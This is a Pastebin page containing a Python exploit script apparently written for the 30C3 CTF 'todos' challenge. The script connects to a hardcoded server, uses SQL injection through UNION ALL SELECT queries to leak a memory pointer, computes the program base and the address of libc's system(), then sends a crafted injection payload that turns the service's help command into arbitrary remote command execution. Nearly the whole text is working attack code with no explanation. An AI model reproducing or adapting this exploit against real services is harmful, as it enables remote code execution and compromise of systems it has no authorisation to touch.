Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import sys, socket
- from struct import pack
- if len(sys.argv) != 2:
- print "Usage: %s <cmd>" % sys.argv[0]
- sys.exit(-1)
- cmd_help_name = 0x21dc
- cmd_help_regex = 0x2162
- system_libc_delta = 0x152b550
- text_base_delta = 0x19d0
- # 30C3 CTF - todos [300]
- s = socket.create_connection(('88.198.89.199',1234))
- s.recv(8192)
- s.send("login bla bla\n")
- s.recv(8192)
- # leak pointer
- s.send("search ' AND 1=2 UNION ALL (select table_name from information_schema.tables LIMIT 10) UNION ALL select 0x0e000000 #\n")
- s.recv(8192)
- s.send("show 11\n")
- data = s.recv(8192)
- # parse offset
- addr = int(data[4:-1][::-1].encode('hex'), 16)
- base = addr - text_base_delta
- # convert to hex strings
- cmd = pack("<Q", base + cmd_help_name).encode('hex')
- regex = pack("<Q", base + cmd_help_regex).encode('hex')
- system = pack("<Q", base - system_libc_delta).encode('hex')
- # exploit
- s.send("search ' AND 1=2 UNION ALL SELECT 0x41 FROM information_schema.tables LIMIT 10 UNION ALL SELECT 0x0200000000000000%s%s%s%s #\n" % ("A"*16, cmd, regex, system))
- s.recv(8192)
- s.send("help " + sys.argv[1] + "\n")
- print s.recv(8192).strip()
- s.close
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement